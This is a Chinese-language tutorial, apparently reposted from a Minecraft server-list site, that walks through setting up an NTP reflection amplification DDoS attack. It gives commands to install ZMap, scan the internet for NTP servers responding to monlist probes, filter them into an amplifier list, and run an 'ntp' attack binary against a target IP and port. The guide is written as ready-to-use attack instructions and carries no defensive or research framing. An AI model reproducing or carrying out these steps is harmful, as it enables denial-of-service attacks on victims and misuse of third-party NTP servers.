NTP反射放大脚本(去后门版)

1.升级所有包,改变软件设置和系统设置,系统版本内核都升级

yum -y update

2.下载rpm包(区分centos6 与centos7 执行不同的命令)

centos6:
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
sudo rpm -Uvh epel-release-6-8.noarch.rpm
centos7:
wget http://mirror.centos.org/centos/7/extras/x86_64/Packages/epel-release-7-11.noarch.rpm
sudo rpm -Uvh epel-release-7-11.noarch.rpm

3.安装必要的依赖环境

yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c

4.安装Zmap

wget https://github.com/zmap/zmap/archive/v1.0.3.tar.gz
tar -zxvf v1.0.3.tar.gz  
cd /root/zmap-1.0.3
cd src/
make
make install

ZMap安装完成,可以运行如下命令测试:

zmap -p 80 -N 10 -B 1M -o -   #很快,程序会输出10个Internet上打开了80端口的主机的IP,你也可以换成22端口23端口试试。具体的用法可以参考ZMap官方文档。

5.开始扫描NTP放大列表

screen zmap -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt

如果在扫描时,你与服务器的会话不小心中断。

你可以重新连接服务器。

使用命令screen -r回到会话。

screen是将程序独立运行在后台,直到执行完成。


6.过滤列表

chmod 777 ntpchecker #添加权限
screen ./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1 #运行检查
awk ‘$2>419{print $1}‘ step1.txt | sort -n | uniq | sort -R > ntpamp.txt #过滤列表

7.攻击命令

chmod 777 ntp #赋予权限
./ntp 127.0.0.1 80 ntpamp.txt 100 -1 100



转载请说明出处
百妖岛_我的世界服务器列表_MineCraft服务器联机平台_MC服务器大全 » NTP反射放大脚本(去后门版)